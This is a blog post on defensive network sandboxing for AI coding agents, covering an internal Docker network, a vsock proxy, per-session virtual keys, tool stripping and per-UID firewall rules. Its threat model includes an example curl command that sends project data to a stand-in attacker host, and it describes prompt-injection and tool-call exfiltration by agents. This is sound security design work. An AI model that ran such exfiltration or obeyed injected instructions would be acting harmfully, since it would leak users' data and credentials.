AI Fortress, Part 2: Network Sandboxing for Coding Agents

Recap

A month ago I wrote up AI Fortress, a defense-in-depth sandbox for coding agents on Linux: KVM virtual machine, immutable Flatcar root, gVisor user-space kernel, ephemeral project-scoped Docker container. Four nested layers between Claude Code (or any agent) and the host workstation.

That post closed with a list of limitations. The biggest gap was network policy:

- "No network policy enforcement." Containers had outbound network access by default. A compromised agent could exfiltrate over HTTPS to anywhere on the internet.

This follow-up describes how that gap is closed: a fifth, network-shaped tier of isolation built on top of the existing four. The other limitations from the original post (Linux-only host, single VM, bootstrap supply chain) are still open. I’ll touch on the macOS angle briefly at the end as possible future work.

Threat Model: Why a Network Tier

The original threat model handled supply chain compromise and persistent malware in the abstract, but not their natural finishing move: outbound HTTPS. Specifically:

- Agent-as-egress. A prompt-injected agent decides to curl -X POST attacker.example/evil with whatever it can read in the project tree. Nothing in the original four layers stopped it.

- Tool-call exfiltration. Modern frontier models ship built-in tools (web_search_*, web_fetch_*, code_execution_*, computer_*), any of which is a perfectly good exfiltration channel. The agent doesn’t have to write the request; it just has to forward the tool definition.

- Upstream key theft. The original setup forwarded ANTHROPIC_API_KEY and OPENAI_API_KEY straight into the sandbox as environment variables. A malicious npm postinstall, a pip dependency that prints os.environ, an injected log line: any of those leaks the real key.

Each of these has the same shape: the sandbox can speak HTTPS to anywhere. The fix is to take that capability away.

The New Tier at a Glance



The sandbox now lives on a Docker network created with --internal, which leaves containers with no default route off the bridge (docs.docker.com). Inside that network, exactly one DNS alias resolves: authproxy, with the proxy listening on port 4000.

Five quick observations about that diagram:

- gVisor is not what’s isolating the network here. gVisor’s job is syscall interception via the Sentry user-space kernel (gvisor.dev); on its own it does not enforce egress policy. The --internal Docker bridge is doing that work.

- The host↔VM hop is AF_VSOCK, not IP. AF_VSOCK is a VM-oriented socket family that uses (CID, port) rather than IP addresses, ridden over virtio-vsock on KVM (vsock(7), QEMU virtio-vsock). There is no IP path between sandbox and host to guess at.

- The sandbox can’t reach 127.0.0.1 inside the VM either. A naive setup that listens on the VM’s loopback would let any container on sandbox_net --add-host its way around the proxy. The vsock relay closes that bypass.

- authproxy is the only label on the bridge. Each additional alias requires its own labeled vsock shim; the launcher discovers them and injects matching DNS aliases.

- The agent’s own API key is never the upstream key. It’s a per-session virtual key, scoped and capped (next section).

Virtual Keys and the Master Key

The proxy (Bifrost in the current implementation) is a LiteLLM-compatible gateway running as a Docker container on the host. It mints “virtual keys” (LiteLLM’s term) that carry budget and rate-limit metadata:

max_budget: $5.00 USD

budget_duration: 8h

rpm_limit: 60

A budget reset isn’t a sliding TTL. LiteLLM resets budgets according to budget_duration on a calendar-aligned schedule (LiteLLM docs). The key itself does have a TTL that the launcher controls. The format is sk-bf-<uuid>, which is what the sandbox sees in ANTHROPIC_API_KEY.
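
To make the split between budget metadata and key lifetime concrete, here is a minimal sketch of the body a mint helper might send. It assumes a LiteLLM-style key-generation request; the function name, the duration field for the key TTL, and the metadata fields are hypothetical and not taken from fortress-mint. Only max_budget, budget_duration, and rpm_limit come from the values above.

```python
import json
import os


def build_mint_payload(project: str, launcher_pid: int, key_ttl: str = "8h") -> dict:
    """Assemble the body for a hypothetical key-mint request."""
    return {
        "max_budget": 5.00,       # USD cap for the session
        "budget_duration": "8h",  # budget reset period, not the key lifetime
        "rpm_limit": 60,          # requests per minute
        "duration": key_ttl,      # key TTL (assumed field name), chosen by the launcher
        "metadata": {             # hypothetical bookkeeping, e.g. for an orphan sweeper
            "project": project,
            "launcher_pid": launcher_pid,
        },
    }


if __name__ == "__main__":
    print(json.dumps(build_mint_payload("demo", os.getpid()), indent=2))
```

Recording the launcher PID alongside the key is one way to let a later cleanup job decide which keys are orphaned.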

The real upstream credentials live at /etc/ai-fortress/upstream.env, root-owned, mode 0600. Two helper binaries (fortress-mint and fortress-revoke) run as root and read that file. The user shell that runs agent <project> never sees the master; it only ever receives the virtual key.

That fixes a specific real failure mode: in the original setup, your real Anthropic key was an environment variable available to whatever pip postinstall hook ran inside the sandbox. Now it isn’t there to leak.

There’s still a kill -9 gap. If the launcher dies hard, its virtual key won’t be revoked synchronously. An orphan-sweeper systemd timer runs every five minutes and revokes keys whose owning launcher PID is gone. Worst-case window of unauthorized use: ~5 minutes, capped at $5.
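
The sweeper logic can be sketched in a few lines. This is an illustration under assumptions, not the repo's code: the key-to-PID mapping and the revoke callback are hypothetical stand-ins for whatever the real timer unit reads and calls.

```python
import os
from typing import Callable, Dict, List


def pid_alive(pid: int) -> bool:
    """Return True if a process with this PID currently exists."""
    try:
        os.kill(pid, 0)  # signal 0 checks for existence without delivering a signal
    except ProcessLookupError:
        return False
    except PermissionError:
        return True  # the process exists but belongs to another user
    return True


def sweep(
    keys: Dict[str, int],
    revoke: Callable[[str], None],
    is_alive: Callable[[int], bool] = pid_alive,
) -> List[str]:
    """Revoke every key whose owning launcher PID is gone; return the revoked keys."""
    revoked = []
    for key, pid in keys.items():
        if not is_alive(pid):
            revoke(key)
            revoked.append(key)
    return revoked
```

A bare PID check can be fooled by PID reuse, so a more careful sweeper might also compare the process start time recorded at mint time.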

Tool-Stripping Reverse Proxy

A model with web_fetch is its own egress channel even if you firewalled the host. The fix is small: strip dangerous tool definitions from the JSON request body before the model sees them.

ai-fortress-toolscrub is a reverse proxy that parses outbound requests on /anthropic/v1/messages and removes any tool whose name matches one of:

^web_search_\d{8}$

^web_fetch_\d{8}$

^code_execution_\d{8}$

^computer_\d{8}$

The trailing _\d{8} is the date suffix Anthropic uses to version built-in tools. The model can’t invoke what it doesn’t know exists. The current scope is Anthropic-only; OpenAI/Google paths can be added later by extending scrub_paths and deny_tool_types in the toolscrub config. This is belt-and-suspenders; it doesn’t replace the network controls, it just removes a separate channel that lives on the same wire.
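
The core of the scrub step fits in a short function. The sketch below is not the ai-fortress-toolscrub source; the function names are hypothetical. Anthropic's API carries the dated identifier of a built-in tool in its type field, so this version checks both type and name against the patterns above.

```python
import json
import re

DENY_PATTERNS = [
    re.compile(r"^web_search_\d{8}$"),
    re.compile(r"^web_fetch_\d{8}$"),
    re.compile(r"^code_execution_\d{8}$"),
    re.compile(r"^computer_\d{8}$"),
]


def is_denied(tool: dict) -> bool:
    """True if the tool's type or name matches one of the deny patterns."""
    candidates = (tool.get("type"), tool.get("name"))
    return any(
        isinstance(value, str) and pattern.match(value)
        for value in candidates
        for pattern in DENY_PATTERNS
    )


def scrub_request(body: bytes) -> bytes:
    """Return the JSON request body with denied tool definitions removed."""
    payload = json.loads(body)  # raises on malformed JSON; the caller should reject
    tools = payload.get("tools")
    if isinstance(tools, list):
        payload["tools"] = [
            t for t in tools if not (isinstance(t, dict) and is_denied(t))
        ]
    return json.dumps(payload).encode("utf-8")
```

Letting a parse error propagate means a body the proxy cannot understand is refused rather than forwarded unscrubbed, which is the safer default for a filter like this.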

Host-Side Egress with meta skuid

If Bifrost is itself compromised (a CVE in LiteLLM, or a config mistake), the sandbox-side controls don’t help anymore. The last layer is a host firewall scoped to Bifrost’s UID.

The proxy runs as UID 1500. nftables uses the socket-owner UID selector meta skuid (nftables wiki) to allow only:

- outbound UDP/53 (DNS)

- outbound TCP/443 (HTTPS to upstream LLMs)

- established/related on the inbound side

- loopback in (so the vsock relay can hand off)

UID 1500 cannot open connections to :80, :22, or any other non-443 TCP port. Apart from DNS on UDP/53, a compromised gateway has nowhere to phone home that isn’t a TCP/443 endpoint.

I tried the prettier version first. v1 used a cgroup-based match, but Docker’s process placement made cgroup matching unreliable. UID-based matching survives because meta skuid reads the socket owner directly, regardless of which cgroup Docker dropped the process into.
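
The allow list above amounts to a small decision table. The sketch below models it in Python purely for illustration; it is not the nftables ruleset, and the assumption that other UIDs are left untouched by these rules is mine.

```python
PROXY_UID = 1500  # UID the gateway runs as


def egress_verdict(uid: int, proto: str, dport: int, established: bool = False) -> str:
    """Model the per-UID outbound policy; returns "accept" or "drop"."""
    if uid != PROXY_UID:
        return "accept"  # assumption: sockets owned by other UIDs are out of scope
    if established:
        return "accept"  # traffic on an already-tracked connection
    if (proto, dport) in {("udp", 53), ("tcp", 443)}:
        return "accept"  # DNS and HTTPS to upstream LLMs
    return "drop"


if __name__ == "__main__":
    for proto, port in [("tcp", 443), ("udp", 53), ("tcp", 80), ("tcp", 22)]:
        print(proto, port, egress_verdict(PROXY_UID, proto, port))
```

The table makes the remaining gap visible: the verdict depends on protocol and port only, never on the destination address.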

Usage

The user-facing command is unchanged:

agent <project> [python|default]

agent <project> --image <tag>

agent <project> --image <tag> --env KEY=VAL

Under the hood, agent mints a virtual key, SSHes into the VM, and starts a gVisor-trapped container scoped to /projects/<project> and attached to sandbox_net. The injected ANTHROPIC_API_KEY is the virtual key.
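
A rough sketch of the container start step, as it might run inside the VM. The function name, the /workspace mount point, and the project-name check are assumptions for illustration; the runtime, network name, and project path follow the description above. The key is passed through the docker client's environment rather than on the command line, so it does not show up in the process list.

```python
import re
from typing import Dict, List, Tuple

# Assumed naming rule: no path separators, no leading dot.
PROJECT_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]*")


def sandbox_command(
    project: str, image: str, virtual_key: str
) -> Tuple[List[str], Dict[str, str]]:
    """Build the docker argv and the extra environment for one session."""
    if not PROJECT_RE.fullmatch(project):
        raise ValueError(f"unsafe project name: {project!r}")
    argv = [
        "docker", "run", "--rm", "-it",
        "--runtime=runsc",            # gVisor runtime
        "--network", "sandbox_net",   # internal bridge, no default route
        "-v", f"/projects/{project}:/workspace",  # /workspace is an assumed mount point
        "-e", "ANTHROPIC_API_KEY",    # no value here: docker copies it from its own env
        image,
    ]
    env = {"ANTHROPIC_API_KEY": virtual_key}
    return argv, env
```

A caller would merge the returned environment into its own before running the command, for example with subprocess.run(argv, env={**os.environ, **env}).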

Setup adds two phases on top of the original VM provisioning:

# Host install

sudo bash install-phase1.sh

sudo $EDITOR /etc/ai-fortress/upstream.env # paste real upstream keys here, root-only

newgrp fortress

sudo bash start-phase1.sh

# Re-provision the VM with the updated config.bu

docker run --rm -i --user "$(id -u):$(id -g)" quay.io/coreos/butane:release < config.bu > config.json

sudo install -m 0644 -o qemu -g qemu config.json /var/lib/libvirt/images/config.json

bash burn_it_down.sh

bash do_virt_install.sh

Exposing an additional host service to the sandbox takes one labeled vsock shim. The host runs socat VSOCK-LISTEN:<port>,fork TCP:127.0.0.1:<port> (the host service must bind 127.0.0.1, not 0.0.0.0); the VM runs a socat container on sandbox_net with --label ai-fortress.shim.alias=<name> --device /dev/vsock --security-opt seccomp=unconfined, listening on TCP and connecting to VSOCK-CONNECT:2:<port>. The launcher discovers the labels and adds matching --add-host entries when starting the sandbox container.
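
The discovery step can be sketched as a function over docker inspect output. This is a guess at the shape of the logic, not the launcher's actual code; the function name is hypothetical, while the label key and network name are the ones used above.

```python
import json
from typing import List

ALIAS_LABEL = "ai-fortress.shim.alias"
NETWORK = "sandbox_net"


def add_host_args(inspect_json: str) -> List[str]:
    """Turn `docker inspect` output for shim containers into --add-host flags."""
    args: List[str] = []
    for container in json.loads(inspect_json):
        labels = container.get("Config", {}).get("Labels") or {}
        alias = labels.get(ALIAS_LABEL)
        networks = container.get("NetworkSettings", {}).get("Networks") or {}
        ip = (networks.get(NETWORK) or {}).get("IPAddress")
        if alias and ip:  # skip containers without the label or off the bridge
            args += ["--add-host", f"{alias}:{ip}"]
    return args
```

The input could come from docker ps -q --filter label=ai-fortress.shim.alias piped into docker inspect, and the result is appended to the sandbox container's docker run arguments.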

The repo’s network-test-plan.md is a ~100-test verification matrix (pre-flight, regression, allowed/blocked tests at each phase, lifecycle, strict-mode, cross-cutting). Two tests are load-bearing for the threat model:

- B2-1: a sandboxed container cannot reach the public internet.

- B2-4: a sandboxed container cannot reach the VM’s loopback (no proxy bypass).
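
Both tests reduce to a TCP reachability check run from inside the sandbox. The probe below is a minimal sketch of that idea, not the repo's test harness; the function name and the example targets in the note are hypothetical.

```python
import socket


def can_connect(host: str, port: int, timeout: float = 3.0) -> bool:
    """Return True if a TCP connection to (host, port) succeeds within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # covers refusal, timeout, unreachable network, failed DNS lookup
        return False
```

Inside a correctly configured sandbox one would expect can_connect("authproxy", 4000) to succeed, and a probe of any public address on port 443 to fail.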

There is also a strict vs relaxed forward-chain mode. Default is relaxed, which lets the VM (not the sandbox) reach the internet for things like docker pull. Strict mode closes that too, at the cost of preloading every image you’ll need.

What an Exploit Would Now Require

The original post listed four boundaries an attacker would have to chain. The network tier inserts one more in front, with three sub-conditions:

- Reach a host service. The only endpoint the sandbox can reach is authproxy:4000 on sandbox_net. Every other host or service is unreachable, including 127.0.0.1 inside the VM.

- Get the proxy to talk to an attacker-controlled host. Bifrost only opens TCP/443 to upstreams its config knows about. If Bifrost itself is compromised, nftables on the host still blocks everything except DNS and TCP/443, though it does not restrict which destination is contacted (see Limitations).

- Steal the upstream credential. It is never visible to the sandbox. The master key lives in a root-only file on the host.

Then the original chain: escape gVisor, escape the VM’s Docker namespaces, persist past Flatcar’s immutable root, escape KVM. Five independent boundaries.

Limitations

The original list still applies. This work tightens one item, adds two new ones, and leaves two of the originals open:

- No SNI / host allowlist. UID-1500 egress can reach any HTTPS destination on TCP/443. A compromised Bifrost can pick the destination. Closing this needs a TLS-aware proxy or an SNI-matching firewall layer. (Tightened from the original “no network policy at all.”)

- Soft virtual-key revocation. A kill -9 of the launcher leaks the key for up to ~5 minutes until the sweeper runs. Capped at $5 in damage by max_budget, but not zero.

- Relaxed mode is the default. The VM (not the sandbox) can docker pull. Strict mode is opt-in and shifts that load to image preloading.

- Bootstrap supply chain still trusts curl. runsc is downloaded without a documented checksum or signature step. This was a limitation in the original post; this work didn’t fix it.

- Single VM. All projects share one Flatcar VM. The ephemeral container per session reduces cross-project blast radius, but the VM is still a shared trust boundary.

Possible Future Work: macOS

Linux-only is still a limitation. I haven’t built anything for macOS, but the repo includes MACOS-DESIGN.md, a paper sketch of how the five tiers might map: Lima with vmType: vz (Lima docs) on top of Apple’s Virtualization.framework, a small Go binary in place of socat for the vsock relay, launchd plists where Linux uses systemd units.

The hardest piece to translate is the host firewall. Apple’s TN3165 says PF is not a supported programming interface and points production filtering at NetworkExtension, which is a much bigger lift: codesigning, entitlements, system extension flows. So per-UID egress fidelity on macOS would be weaker than meta skuid on Linux unless someone is willing to ship a NetworkExtension.

Status: design only, no code, and I haven’t decided whether to build it. I wrote it down because I keep getting asked.

Summary

One concrete thing changed since the first AI Fortress post: the agent now has a network leash (internal bridge, vsock-mediated proxy, per-session virtual key, tool-stripping reverse proxy, per-UID firewall). The rest of the stack is unchanged.

Source is at github.com/ranton256/ai-fortress under MIT. The original write-up is here.